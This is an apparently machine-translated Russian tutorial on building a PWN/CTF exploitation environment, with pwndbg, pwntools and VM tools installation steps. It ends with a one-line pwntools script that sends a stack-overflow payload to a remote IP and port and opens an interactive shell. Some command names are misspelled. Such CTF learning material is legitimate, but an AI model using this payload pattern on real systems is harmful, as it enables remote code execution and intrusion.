Если вы хотите хорошо выполнять свою работу, вам необходимо сначала отточить свои инструменты. Независимо от направления сетевой безопасности, у вас есть собственная инструментальная среда, которую вы часто используете. То же самое касается PWN. Наличие полной инструментальной среды может спасти нас. много чего и не вызовет проблем в будущем. В критические моменты, когда дело застревает из-за внешних условий, можно сказать, что можно построить горы и мосты через реки и стать классным пешкой.
Выбор системы должен быть Ubuntu,без сомнения,Перейдите прямо на официальный сайт Linux для загрузки.,Версии можно выбрать за последние годы.,Не слишком старый:
Для установки виртуальной машины необходимы VMware Tools, но версию с закрытым исходным кодом, предоставляемую Vmware, установить сложно, и в официальной документации также указано следующее:
Поэтому мы решили установить Open-VM-Tools:
Инструкция: sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
Затем перезапустите и выберите xorg в интерфейсе входа. В Wayland нет синхронизации буфера обмена и перетаскивания файлов. Теперь вы можете взаимодействовать с хостом:
pwndbg — это плагин для GDB, специально используемый для отладки проблем с pwn, со следующими новыми функциями:
Заказ |
---|
arena |
bins |
Heapbase |
heapinfo |
Parseheap |
tracemalloc |
cylic |
reabse |
stack |
retaddr |
canary |
got |
plt |
Hexdump |
Установить заказ:
apt install git
git clone https://github.com/pwndbg/pwndbg
Затем войдите в каталог pwndbg, запустите setup.sh и начните установку:
После успешной установки вводим в терминале gdb и выводится pwndbg, что доказывает, что установка прошла успешно:
pwntools — библиотека для Python,Часто используется для написания сценариев,Установите Заказ следующим образом:
apt install python3-pip
pip install pwntools
Пример использования:
from pwn import * io =remote('61.147.171.105',63315) bin_sh = 0x400762 My_payload = (b'a'*0xA8+p64(bin_sh)) io.sendline(My_payload) io.interactive()
Для написания скриптов рекомендуется использовать Visual Studio Code, устанавливать его прямо в магазине, искать китайский язык в расширении и выполнять китаизацию: